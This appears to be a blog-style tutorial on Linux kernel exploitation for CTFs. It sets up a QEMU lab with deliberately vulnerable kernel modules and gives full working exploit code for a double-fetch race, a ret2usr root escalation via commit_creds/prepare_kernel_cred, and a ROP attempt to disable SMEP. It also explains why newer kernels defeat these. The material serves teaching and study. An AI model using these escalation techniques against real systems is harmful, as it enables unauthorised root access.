CONFIG_INPUT_KEYBOARD=y
CONFIG_MODULES=y
CONFIG_KPROBES=n
CONFIG_LTO_NONE=y
CONFIG_SERIAL_8250=y
CONFIG_SERIAL_8250_CONSOLE=y
CONFIG_EMBEDDED=n
CONFIG_TMPFS=y
CONFIG_RELOCATABLE=y
CONFIG_RANDOMIZE_BASE=y
CONFIG_USERFAULTFD=y
In order to update the minimal .config
with these options, we use the provided merge_config.sh
script:
$ scripts/kconfig/merge_config.sh .config ../kconfig
$ make -j4
That takes a while, but eventually builds a kernel in arch/x86/boot/bzImage
. This is the same bzImage
that you get in CTF challenges.
When we compile kernel modules for our own kernel, we use the following Makefile
structure:
all:
make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
To compile it for a different kernel, all we do is change the -C
flag to point to the newly-compiled kernel rather than the system's:
all:
make -C /home/ir0nstone/linux M=$(PWD) modules
The module is now compiled for the specific kernel version!
We now have a minimal kernel bzImage
and a kernel module that is compiled for it. Now we need to create a minimal VM to run it in.
To do this, we use busybox
, an executable that contains tiny versions of most Linux executables. This allows us to have all of the required programs, in as little space as possible.
We will download and extract busybox
; you can find the latest version here.
$ curl https://busybox.net/downloads/busybox-1.36.1.tar.bz2 | tar xjf -
We also create an output folder for compiled versions.
$ mkdir busybox_compiled
Now compile it statically. We're going to use the menuconfig
option, so we can make some choices.
$ cd busybox-1.36.1
$ make O=../busybox_compiled menuconfig
Once the menu loads, hit Enter
on Settings
. Hit the down arrow key until you reach the option Build static binary (no shared libs)
. Hit Space
to select it, and then Escape
twice to leave. Make sure you choose to save the configuration.
Now, make it with the new options
$ cd ../busybox_compiled
$ make -j
$ make install
Now we make the file system.
$ cd ..
$ mkdir initramfs
$ cd initramfs
$ mkdir -pv {bin,dev,sbin,etc,proc,sys/kernel/debug,usr/{bin,sbin},lib,lib64,mnt/root,root}
$ cp -av ../busybox_compiled/_install/* .
$ sudo cp -av /dev/{null,console,tty,sda1} dev/
The last thing missing is the classic init
script, which gets run on system load. A provisional one works fine for now:
#!/bin/sh
mount -t proc none /proc
mount -t sysfs none /sys
echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n"
exec /bin/sh
Make it executable
$ chmod +x init
Finally, we're going to bundle it into a cpio
archive, which is understood by QEMU.
find . -not -name '*.cpio' | cpio -o -H newc > initramfs.cpio
The -not -name *.cpio
is there to prevent the archive from including itself
You can even compress the filesystem to a .cpio.gz
file, which QEMU also recognises
If we want to extract the cpio
archive (say, during a CTF) we can use this command:
$ cpio -i -F initramfs.cpio
Put bzImage
and initramfs.cpio
into the same folder. Write a short run.sh
script that loads QEMU:
#!/bin/sh
qemu-system-x86_64 \
-kernel bzImage \
-initrd initramfs.cpio \
-append "console=ttyS0 quiet loglevel=3 oops=panic" \
-monitor /dev/null \
-nographic \
-no-reboot
Once we make this executable and run it, we get loaded into a VM!
Right now, we have a minimal linux kernel we can boot, but if we try and work out who we are, it doesn't act quite as we expect it to:
~ # whoami
whoami: unknown uid 0
This is because /etc/passwd
and /etc/group
don't exist, so we can just create those!
root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:User:/home/user:/bin/sh
root:x:0:
user:x:1000:
The final step is, of course, the loading of the kernel module. I will be using the module from my Double Fetch section for this step.
First, we copy the .ko
file to the filesystem root. Then we modify the init
script to load it, and also set the UID of the loaded shell to 1000
(so we are not root!).
#!/bin/sh
insmod /double_fetch.ko
mknod /dev/double_fetch c 253 0
chmod 666 /dev/double_fetch
mount -t proc none /proc
mount -t sysfs none /sys
mknod -m 666 /dev/ttyS0 c 4 64
setsid /bin/cttyhack setuidgid 1000 /bin/sh
Here I am assuming that the major number of the double_fetch
module is 253
.
Why am I doing that?
If we load into a shell and run cat /proc/devices
, we can see that double_fetch
is loaded with major number 253
every time. I can't find any way to load this in without guessing the major number, so we're sticking with this for now - please get in touch if you find one!
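One idea for avoiding the hardcoded number (my own, untested beyond this setup): mount /proc before loading the module, then read the major number straight out of /proc/devices. This assumes the busybox build includes awk and that the module registers its device under the name double_fetch:
#!/bin/sh
mount -t proc none /proc
insmod /double_fetch.ko
# look up the assigned major number instead of hardcoding 253
major=$(awk '$2 == "double_fetch" {print $1}' /proc/devices)
mknod /dev/double_fetch c "$major" 0
chmod 666 /dev/double_fetch
# ... rest of the init script as before ...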
If we want to compile a kernel version that is not the latest, we'll dump all the tags:
$ git fetch --tags
It takes ages to run, naturally. Once we do that, we can check out a specific version of choice:
$ git checkout v5.11
We then continue from there.
Some tags seem to not have the correct header files for compilation. Others, weirdly, build fine but the resulting kernel never loads in QEMU. I'm not quite sure why, to be frank.
The kernel is the program at the heart of the Operating System. It is responsible for controlling every aspect of the computer, from the nature of syscalls to the integration between software and hardware. As such, exploiting the kernel can lead to some incredibly dangerous bugs.
In the context of CTFs, Linux kernel exploitation often involves the exploitation of kernel modules. This is an integral feature of Linux that allows users to extend the kernel with their own code, adding additional features.
You can find an excellent introduction to Kernel Drivers and Modules by LiveOverflow here, and I recommend it highly.
Kernel Modules are written in C and compiled to a .ko
(Kernel Object) format. Most kernel modules are compiled for a specific kernel version (which can be checked with uname -r
, my Xenial Xerus is 4.15.0-128-generic
). We can load and unload these modules using the insmod
and rmmod
commands respectively. Kernel modules are often loaded into /dev/*
or /proc/
. There are 3 main module types: Char, Block and Network.
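Before looking at each type, it's worth seeing what the bare bones of a module look like. This isn't one of the challenge modules, just the classic skeleton; it can be built with the Makefile structure from earlier and loaded with insmod:
// hello.c - a minimal loadable kernel module
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>

static int __init hello_init(void)
{
    printk(KERN_INFO "hello: module loaded\n");
    return 0;
}

static void __exit hello_exit(void)
{
    printk(KERN_INFO "hello: module unloaded\n");
}

module_init(hello_init);
module_exit(hello_exit);
MODULE_LICENSE("GPL");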
Char Modules are deceptively simple. Essentially, you can access them as a stream of bytes - just like a file - using syscalls such as open
. In this way, they're almost like dynamic files (at a super basic level), as the values read and written can change.
Examples of Char modules include /dev/random
.
Removing the artificial sleep
In reality, there won't be a 1-second sleep for your race condition to occur. This means we instead have to hope that it occurs in the assembly instructions between the two dereferences!
This will not work every time - in fact, it's quite likely to not work! - so we will instead have two loops; one that keeps writing 0
to the ID, and another that writes another value - e.g. 900
- and then calls write
. The aim is for the thread that switches to 0
to sync up so perfectly that the switch occurs inbetween the ID check and the ID "assignment".
If we check the source, we can see that there is no msleep
any longer:
if (creds->id == 0) {
printk(KERN_ALERT "[Double-Fetch] Attempted to log in as root!");
return -1;
}
printk("[Double-Fetch] Attempting login...");
if (!strcmp(creds->password, PASSWORD)) {
id = creds->id;
printk(KERN_INFO "[Double-Fetch] Password correct! ID set to %d", id);
return id;
}
Our exploit is going to look slightly different! We'll create the Credentials
struct again and set the ID to 900
:
Credentials creds;
creds.id = 900;
strcpy(creds.password, "p4ssw0rd");
Then we are going to write this struct to the module repeatedly. We will loop it 1,000,000 times (effectively infinite) to make sure it terminates:
// don't want to make the loop infinite, just in case
for (int i = 0; i < 1000000; i++) {
// now we write the cred struct to the module
res_id = write(fd, &creds, 0);
// if res_id is 0, stop the race
if (!res_id) {
puts("[+] ID is 0!");
break;
}
}
If the ID returned is 0
, we won the race! It is really important to keep in mind exactly what the "success" condition is, and how you can check for it.
Now, in the second thread, we will constantly cycle between ID 900
and 0
. We do this in the hope that it will be 900
on the first dereference, and 0
on the second! I make this loop infinite because it is a thread, and the thread will be killed when the program is (provided you remove pthread_join()
! Otherwise your main thread will wait forever for the second to stop!).
void *switcher(void *arg) {
volatile Credentials *creds = (volatile Credentials *)arg;
while (1) {
creds->id = 0;
creds->id = 900;
}
}
If we compile the exploit and run it, we get the desired result:
~ $ ./exploit
FD: 3
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[ 2.140099] [Double-Fetch] Attempted to log in as root!
[+] ID is 0!
[-] Finished race
Look how quick that was! Insane - two fails, then a success!
You might be wondering how tight the race window can be for exploitation - well, gnote
from TokyoWesterns CTF 2019 had a race of two assembly instructions:
; note that rbx is the buf argument, user-controlled
cmp dword ptr [rbx], 5
ja default_case
mov eax, [rbx]
mov rax, jump_table[rax*8]
jmp rax
The dereferences [rbx]
have just one assembly instruction between them, yet we are capable of racing. THAT is just how tight!
We're going to create a really basic authentication module that allows you to read the flag if you input the correct password. Here is the relevant code:
#define PASSWORD "p4ssw0rd"
#define FLAG "flag{YES!}"
#define FAIL "FAIL: Not Authenticated!"
static int authenticated = 0;
static ssize_t auth_read(struct file *filp, char __user *buf, size_t len, loff_t *off) {
printk(KERN_ALERT "[Auth] Attempting to read flag...");
if (authenticated) {
copy_to_user(buf, FLAG, sizeof(FLAG)); // ignoring `len` here
return 1;
}
copy_to_user(buf, FAIL, sizeof(FAIL));
return 0;
}
static ssize_t auth_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
char password_attempt[20];
printk(KERN_ALERT "[Auth] Reading password from user...");
copy_from_user(password_attempt, buf, count);
if (!strcmp(password_attempt, PASSWORD)) {
printk(KERN_ALERT "[Auth] Password correct!");
authenticated = 1;
return 1;
}
printk(KERN_ALERT "[Auth] Password incorrect!");
return 0;
}
If we attempt to read()
from the device, it checks the authenticated
flag to see if it can return us the flag. If not, it sends back FAIL: Not Authenticated!
.
In order to update authenticated
, we have to write()
to the kernel module. What we attempt to write is compared to p4ssw0rd
. If it's not equal, nothing happens. If it is, authenticated
is updated and the next time we read()
it'll return the flag!
Let's first try and interact with the kernel by reading from it.
We'll start by opening the device and reading from it.
int fd = open("/dev/authentication", O_RDWR);
char buffer[20];
read(fd, buffer, 20);
printf("%s\n", buffer);
After compiling and running it, we see that we are not authenticated:
$ ./exploit
FAIL: Not Authenticated!
Epic! Let's write the correct password to the device then try again. It's really important to send the null byte here! That's because copy_from_user()
does not automatically add it, so the strcmp
will fail otherwise!
write(fd, "p4ssw0rd\0", 9);
read(fd, buffer, 20);
printf("%s\n", buffer);
It works!
$ ./exploit
FAIL: Not Authenticated!
flag{YES!}
Amazing! Now for something really important:
$ ./exploit
flag{YES!}
flag{YES!}
The state is preserved between connections! Because the kernel module remains on, you will be authenticated until the module is reloaded (either via rmmod
then insmod
, or a system restart).
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <string.h>
#include <unistd.h>
int main() {
int fd = open("/dev/authentication", O_RDWR);
char buffer[20];
read(fd, buffer, 1);
printf("%s\n", buffer);
write(fd, "p4ssw0rd", 8);
read(fd, buffer, 20);
printf("%s\n", buffer);
}
So, here's your challenge! Write the same kernel module, but using ioctl
instead. Then write a program to interact with it and perform the same operations. ZIP file including both below, but no cheating! This is really good practice.
Supervisor Memory Execute Protection
If ret2usr is analogous to ret2shellcode, then SMEP is the new NX. SMEP is a primitive protection that ensures any code executed in kernel mode is located in kernel space. This means a simple ROP back to our own shellcode no longer works. To bypass SMEP, we have to use gadgets located in the kernel to achieve what we want to (without switching to userland code).
In older kernel versions we could use ROP to disable SMEP entirely, but this has been patched out. This was possible because SMEP is determined by the 20th bit of the CR4 register, meaning that if we can control CR4 we can disable SMEP from messing with our exploit.
We can enable SMEP in the VM via the QEMU -cpu flag (qemu64
itself is nothing notable, just the default CPU model):
-cpu qemu64,+smep
ROPpety boppety, but now in the kernel
By and large, the principle of userland ROP holds strong in the kernel. We still want to overwrite the return pointer, the only question is where.
The most basic of examples is the ret2usr technique, which is analogous to ret2shellcode - we write our own assembly that calls commit_creds(prepare_kernel_cred(0))
, and overwrite the return pointer to point there.
The relevant code is here:
static ssize_t rop_write(struct file *filp, const char __user *buf, size_t count, loff_t *f_pos) {
char buffer[0x20];
printk(KERN_INFO "Testing...");
memcpy(buffer, buf, 0x100);
printk(KERN_INFO "Yes? %s", buffer);
return 0;
}
As we can see, it's a size 0x100
memcpy
into an 0x20
buffer. Not the hardest thing in the world to spot. The second printk
call here is so that buffer
is used somewhere, otherwise it's just optimised out by make
and the entire function just becomes xor eax, eax; ret
!
Firstly, we want to find the location of prepare_kernel_cred()
and commit_creds()
. We can do this by reading /proc/kallsyms
, a file that contains all of the kernel symbols and their locations (including those of our kernel modules!). This will remain constant, as we have disabled KASLR.
For obvious reasons, you require root permissions to read this file!
~ # cat /proc/kallsyms | grep cred
[...]
ffffffff81066e00 T commit_creds
ffffffff81066fa0 T prepare_kernel_cred
[...]
Now we know the locations of the two important functions. From here, the assembly is pretty simple. First we call prepare_kernel_cred(0)
:
xor rdi, rdi
mov rcx, 0xffffffff81066fa0
call rcx
Then we call commit_creds()
on the result (which is stored in RAX):
mov rdi, rax
mov rcx, 0xffffffff81066e00
call rcx
We can throw this directly into the C code using inline assembly:
void escalate() {
__asm__(
".intel_syntax noprefix;"
"xor rdi, rdi;"
"movabs rcx, 0xffffffff81066fa0;" // prepare_kernel_cred
"call rcx;"
"mov rdi, rax;"
"movabs rcx, 0xffffffff81066e00;" // commit_creds
"call rcx;"
);
}
The next step is overflowing. The 7th qword
overwrites RIP:
// overflow
uint64_t payload[7];
payload[6] = (uint64_t) escalate;
write(fd, payload, 0);
Finally, we create a get_shell()
function we call at the end, once we've escalated privileges:
void get_shell() {
system("/bin/sh");
}
int main() {
// [ everything else ]
get_shell();
}
If we run what we have so far, we fail and the kernel panics. Why is this?
The reason is that once the kernel executes commit_creds()
, it doesn't return back to user space - instead it'll pop the next junk off the stack, which causes the kernel to crash and panic! You can see this happening while you debug (which we'll cover soon).
What we have to do is force the kernel to swap back to user mode. The way we do this is by saving the initial userland register state at the start of the program's execution; then, once we have escalated privileges in kernel mode, we restore the registers to swap back to user mode. This reverts execution to the exact state it was in before we ever entered kernel mode!
We can store them as follows:
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;
void save_state() {
puts("[*] Saving state");
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[+] Saved state");
}
The CS, SS, RSP and RFLAGS registers are stored in 64-bit values within the program. To restore them, we append extra assembly instructions in escalate()
for after the privileges are acquired:
uint64_t user_rip = (uint64_t) get_shell;
void escalate() {
__asm__(
".intel_syntax noprefix;"
"xor rdi, rdi;"
"movabs rcx, 0xffffffff81066fa0;" // prepare_kernel_cred
"call rcx;"
"mov rdi, rax;"
"movabs rcx, 0xffffffff81066e00;" // commit_creds
"call rcx;"
// restore all the registers
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_rsp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}
Here the GS, CS, SS, RSP and RFLAGS registers are restored to bring us back to user mode (GS via the swapgs
instruction). The RIP register is updated to point to get_shell
and pop a shell.
If we compile it statically and load it into the initramfs.cpio
, notice that our privileges are elevated!
$ gcc -static -o exploit exploit.c
[...]
$ ./run.sh
~ $ ./exploit
[*] Saving state
[+] Saved state
FD: 3
[*] Returned to userland
~ # id
uid=0(root) gid=0(root)
We have successfully exploited a ret2usr!
How exactly does the above assembly code restore registers, and why does it return us to user space? To understand this, we have to know what all of the registers do. The switch to kernel mode is best explained by a couple of StackOverflow posts.
GS - limited segmentation. The contents of the GS register are swapped with one of the MSRs (model-specific registers); at the entry to a kernel-space routine, swapgs
enables the process to obtain a pointer to kernel data structures.
Has to swap back to user space
SS - Stack Segment
Defines where the stack is stored
Must be reverted back to the userland stack
RSP
Same as above, really
CS - Code Segment
Defines the memory location that instructions are stored in
Must point to our user space code
RFLAGS - various things
GS is changed back via the swapgs
instruction. All others are changed back via iretq
, the QWORD variant of the iret
family of intel instructions. The intent behind iretq
is to be the way to return from exceptions, and it is specifically designed for this purpose, as seen in Vol. 2A 3-541 of the Intel Software Developer’s Manual:
Returns program control from an exception or interrupt handler to a program or procedure that was interrupted by an exception, an external interrupt, or a software-generated interrupt. These instructions are also used to perform a return from a nested task. (A nested task is created when a CALL instruction is used to initiate a task switch or when an interrupt or exception causes a task switch to an interrupt or exception handler.)
[...]
During this operation, the processor pops the return instruction pointer, return code segment selector, and EFLAGS image from the stack to the EIP, CS, and EFLAGS registers, respectively, and then resumes execution of the interrupted program or procedure.
As we can see, it pops all the registers off the stack, which is why we push the saved values in that specific order. It may be possible to restore them sequentially without this instruction, but that increases the likelihood of things going wrong as one restoration may have an adverse effect on the following - much better to just use iretq
.
The final version
// gcc -static -o exploit exploit.c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <stdint.h>
void get_shell(void){
puts("[*] Returned to userland");
system("/bin/sh");
}
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rsp;
uint64_t user_rflags;
uint64_t user_rip = (uint64_t) get_shell;
void save_state(){
puts("[*] Saving state");
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_rsp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[+] Saved state");
}
void escalate() {
__asm__(
".intel_syntax noprefix;"
"xor rdi, rdi;"
"movabs rcx, 0xffffffff81066fa0;" // prepare_kernel_cred
"call rcx;"
"mov rdi, rax;"
"movabs rcx, 0xffffffff81066e00;" // commit_creds
"call rcx;"
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_rsp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}
int main() {
save_state();
// communicate with the module
int fd = open("/dev/kernel_rop", O_RDWR);
printf("FD: %d\n", fd);
// overflow
uint64_t payload[7];
payload[6] = (uint64_t) escalate;
write(fd, payload, 0);
}
An old technique
Using the same setup as ret2usr, we make one key modification - adding +smep to the -cpu flag - in run.sh
:
#!/bin/sh
qemu-system-x86_64 \
-kernel bzImage \
-initrd initramfs.cpio \
-append "console=ttyS0 quiet loglevel=3 oops=panic nokaslr pti=off" \
-monitor /dev/null \
-nographic \
-no-reboot \
-smp cores=2 \
-cpu qemu64,+smep \
-s
Now if we load the VM and run our exploit from last time, we get a kernel panic.
It's worth noting what it looks like for the future - especially these 3 lines:
[ 1.628692] unable to execute userspace code (SMEP?) (uid: 1000)
[ 1.631337] BUG: unable to handle page fault for address: 00000000004016b9
[ 1.633781] #PF: supervisor instruction fetch in kernel mode
So, instead of just returning back to userspace, we will try to overwrite CR4. Luckily, the kernel contains a very useful function for this: native_write_cr4(val)
. This function quite literally overwrites CR4.
Assuming KASLR is still off, we can get the address of this function via /proc/kallsyms
(if we update init
to log us in as root
):
~ # cat /proc/kallsyms | grep native_write_cr4
ffffffff8102b6d0 T native_write_cr4
Ok, it's located at 0xffffffff8102b6d0
. What do we want to change CR4 to? If we look at the kernel panic above, we see this line:
[ 1.654685] CR2: 00000000004016b9 CR3: 0000000001292000 CR4: 00000000001006b0
CR4 is currently 0x00000000001006b0
. If we remove the 20th bit (from the smallest, zero-indexed) we get 0x6b0
.
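As a quick sanity check of that arithmetic (a snippet of mine, not part of the exploit):
#include <stdio.h>
#include <stdint.h>

int main(void) {
    uint64_t cr4  = 0x1006b0;       // CR4 value from the panic dump
    uint64_t smep = 1ULL << 20;     // CR4.SMEP is bit 20
    printf("0x%lx\n", cr4 & ~smep); // prints 0x6b0
    return 0;
}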
The last thing we need to do is find some gadgets. To do this, we have to convert the bzImage
file into a vmlinux
ELF file so that we can run ropper
or ROPgadget
on it. To do this, we can run extract-vmlinux
, from the official Linux git repository.
$ ./extract-vmlinux bzImage > vmlinux
$ file vmlinux
vmlinux: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, BuildID[sha1]=3003c277e62b32aae3cfa84bb0d5775bd2941b14, stripped
$ ropper -f vmlinux --search "pop rdi"
0xffffffff811e08ec: pop rdi; ret;
All that changes in the exploit is the overflow:
// overflow
uint64_t payload[20];
int i = 6;
payload[i++] = 0xffffffff811e08ec; // pop rdi; ret
payload[i++] = 0x6b0;
payload[i++] = 0xffffffff8102b6d0; // native_write_cr4
payload[i++] = (uint64_t) escalate;
write(fd, payload, 0);
We can then compile it and run.
This fails. Why?
If we look at the resulting kernel panic, we meet an old friend:
[ 1.542923] unable to execute userspace code (SMEP?) (uid: 0)
[ 1.545224] BUG: unable to handle page fault for address: 00000000004016b9
[ 1.547037] #PF: supervisor instruction fetch in kernel mode
SMEP is enabled again. How? If we debug the exploit, we definitely hit both the gadget and the call to native_write_cr4()
. What gives?
Well, if we look at the source, there's another feature:
void __no_profile native_write_cr4(unsigned long val)
{
unsigned long bits_changed = 0;
set_register:
asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");
if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
goto set_register;
}
/* Warn after we've corrected the changed bits. */
WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
bits_changed);
}
}
Essentially, it will check if the val
that we input disables any of the bits defined in cr4_pinned_bits
. This value is set on boot, and effectively stops "sensitive CR bits" from being modified. If any of them are changed, they are forced back to their pinned values. Effectively, modifying CR4 doesn't work any longer - and hasn't since version 5.3-rc1.
A practical example
Let's try and run our previous code, but with the latest kernel version (as of writing, 6.10-rc5
). The offsets of commit_creds
and prepare_kernel_cred()
are as follows, and we'll update exploit.c
with the new values:
commit_creds 0xffffffff81077390
prepare_kernel_cred 0xffffffff81077510
Instead of an elevated shell, we get a kernel panic, with the following data dump:
[ 1.472064] BUG: kernel NULL pointer dereference, address: 0000000000000000
[ 1.472064] #PF: supervisor read access in kernel mode
[ 1.472064] #PF: error_code(0x0000) - not-present page
[ 1.472064] PGD 22d9067 P4D 22d9067 PUD 22da067 PMD 0
[ 1.472064] Oops: Oops: 0000 [#1] SMP
[ 1.472064] CPU: 0 PID: 32 Comm: exploit Tainted: G W O 6.10.0-rc5 #7
[ 1.472064] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[ 1.472064] RIP: 0010:commit_creds+0x29/0x180
[ 1.472064] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
[ 1.472064] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
[ 1.472064] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
[ 1.472064] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
[ 1.472064] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
[ 1.472064] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
[ 1.472064] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
[ 1.472064] FS: 000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 1.472064] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1.472064] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
[ 1.472064] Call Trace:
[ 1.472064] <TASK>
[ 1.472064] ? show_regs+0x64/0x70
[ 1.472064] ? __die+0x24/0x70
[ 1.472064] ? page_fault_oops+0x14b/0x420
[ 1.472064] ? search_extable+0x2b/0x30
[ 1.472064] ? commit_creds+0x29/0x180
[ 1.472064] ? search_exception_tables+0x4f/0x60
[ 1.472064] ? fixup_exception+0x26/0x2d0
[ 1.472064] ? kernelmode_fixup_or_oops.constprop.0+0x58/0x70
[ 1.472064] ? __bad_area_nosemaphore+0x15d/0x220
[ 1.472064] ? find_vma+0x30/0x40
[ 1.472064] ? bad_area_nosemaphore+0x11/0x20
[ 1.472064] ? exc_page_fault+0x284/0x5c0
[ 1.472064] ? asm_exc_page_fault+0x2b/0x30
[ 1.472064] ? abort_creds+0x30/0x30
[ 1.472064] ? commit_creds+0x29/0x180
[ 1.472064] ? x64_sys_call+0x146c/0x1b10
[ 1.472064] ? do_syscall_64+0x50/0x110
[ 1.472064] ? entry_SYSCALL_64_after_hwframe+0x4b/0x53
[ 1.472064] </TASK>
[ 1.472064] Modules linked in: kernel_rop(O)
[ 1.472064] CR2: 0000000000000000
[ 1.480065] ---[ end trace 0000000000000000 ]---
[ 1.480065] RIP: 0010:commit_creds+0x29/0x180
[ 1.480065] Code: 00 f3 0f 1e fa 55 48 89 e5 41 55 65 4c 8b 2d 9e 80 fa 7e 41 54 53 4d 8b a5 98 05 00 00 4d 39 a5 a0 05 00 00 0f 85 3b 01 00 00 <48> 8b 07 48 89 fb 48 85 c0 0f 8e 2e 01 07
[ 1.484065] RSP: 0018:ffffc900000d7e30 EFLAGS: 00000246
[ 1.484065] RAX: 0000000000000000 RBX: 00000000004a8220 RCX: ffffffff81077390
[ 1.484065] RDX: 0000000000000000 RSI: 00000000ffffffea RDI: 0000000000000000
[ 1.484065] RBP: ffffc900000d7e48 R08: ffffffff818a7a28 R09: 0000000000004ffb
[ 1.484065] R10: 00000000000000a5 R11: ffffffff818909b8 R12: ffff88800219b480
[ 1.484065] R13: ffff888002202e00 R14: 0000000000000000 R15: 0000000000000000
[ 1.484065] FS: 000000001b323380(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 1.484065] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1.484065] CR2: 0000000000000000 CR3: 00000000022d7000 CR4: 00000000000006b0
[ 1.488065] Kernel panic - not syncing: Fatal exception
[ 1.488065] Kernel Offset: disabled
[ 1.488065] ---[ end Kernel panic - not syncing: Fatal exception ]---
I could have left this part out of my blog, but it's valuable to know a bit more about debugging the kernel and reading error messages. I actually came across this issue while trying to get the previous section working, so it happens to all of us!
One thing we notice is that the error here is listed as a NULL pointer dereference. We can see that it is thrown in commit_creds()
:
[ 1.480065] RIP: 0010:commit_creds+0x29/0x180
We can check the source here, but chances are that the parameter passed to commit_creds()
is NULL - this appears to be the case, since RDI is shown to be 0
above!
In our run.sh
script, we now include the -s
flag. This flag opens up a GDB server on port 1234
, so we can connect to it and debug the kernel. Another useful flag is -S
, which will automatically pause the kernel on load to allow us to debug, but that's not necessary here.
What we'll do is pause our exploit
binary just before the write()
call by using getchar()
, which will hang until we hit Enter
or something similar. Once it pauses, we'll hook on with GDB. Knowing the address of commit_creds()
is 0xffffffff81077390
, we can set a breakpoint there.
$ gdb kernel_rop.ko
pwndbg> target remote :1234
pwndbg> b *0xffffffff81077390
We then continue with c
and go back to the VM terminal, where we hit Enter
to continue the exploit. Coming back to GDB, it has hit the breakpoint, and we can see that RDI is indeed 0
:
pwndbg> info reg rdi
rdi 0x0 0
This explains the NULL dereference. RAX is also 0
, in fact, so it's not a problem with the mov
:
pwndbg> info reg rax
rax 0x0 0
This means that prepare_kernel_cred()
is returning NULL
. Why is that? It didn't do that before!
Let's compare the differences in prepare_kernel_cred()
code between kernel version 6.1 and version 6.10:
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
const struct cred *old;
struct cred *new;
new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
if (!new)
return NULL;
kdebug("prepare_kernel_cred() alloc %p", new);
if (daemon)
old = get_task_cred(daemon);
else
old = get_cred(&init_cred);
validate_creds(old);
*new = *old;
new->non_rcu = 0;
atomic_long_set(&new->usage, 1);
set_cred_subscribers(new, 0);
get_uid(new->user);
get_user_ns(new->user_ns);
get_group_info(new->group_info);
// [...]
if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
goto error;
put_cred(old);
validate_creds(new);
return new;
error:
put_cred(new);
put_cred(old);
return NULL;
}
struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
const struct cred *old;
struct cred *new;
if (WARN_ON_ONCE(!daemon))
return NULL;
new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
if (!new)
return NULL;
kdebug("prepare_kernel_cred() alloc %p", new);
old = get_task_cred(daemon);
*new = *old;
new->non_rcu = 0;
atomic_long_set(&new->usage, 1);
get_uid(new->user);
get_user_ns(new->user_ns);
get_group_info(new->group_info);
// [...]
new->ucounts = get_ucounts(new->ucounts);
if (!new->ucounts)
goto error;
if (security_prepare_creds(new, old, GFP_KERNEL_ACCOUNT) < 0)
goto error;
put_cred(old);
return new;
error:
put_cred(new);
put_cred(old);
return NULL;
}
The first and last parts are effectively identical, so there's no issue there. The issue arises in the way a NULL argument is handled. In the older version, a NULL daemon means the credentials are copied from init_cred, the credentials of the initial task
:
if (daemon)
old = get_task_cred(daemon);
else
old = get_cred(&init_cred);
i.e. if daemon
is NULL, use init_cred (the credentials of init_task)
. On 6.10, the behaviour is altogether different:
if (WARN_ON_ONCE(!daemon))
return NULL;
If daemon
is NULL, return NULL - hence our issue!
Unfortunately, there's no way to bypass this easily! We can fake cred
structs, and if we can leak init_task
we can use that memory address as well, but it's no longer as simple as calling prepare_kernel_cred(0)
!
Heavily beta
Userspace exploitation often has the end goal of code execution. In the case of kernel exploitation, we already have code execution; our aim is to escalate privileges, so that when we spawn a shell (or do anything else) using execve("/bin/sh", NULL, NULL)
we are dropped as root
.
To understand this, we have a talk a little about how privileges and credentials work in Linux.
The cred
struct contains all the permissions a task holds. The ones that we care about are typically these:
struct cred {
/* ... */
kuid_t uid; /* real UID of the task */
kgid_t gid; /* real GID of the task */
kuid_t suid; /* saved UID of the task */
kgid_t sgid; /* saved GID of the task */
kuid_t euid; /* effective UID of the task */
kgid_t egid; /* effective GID of the task */
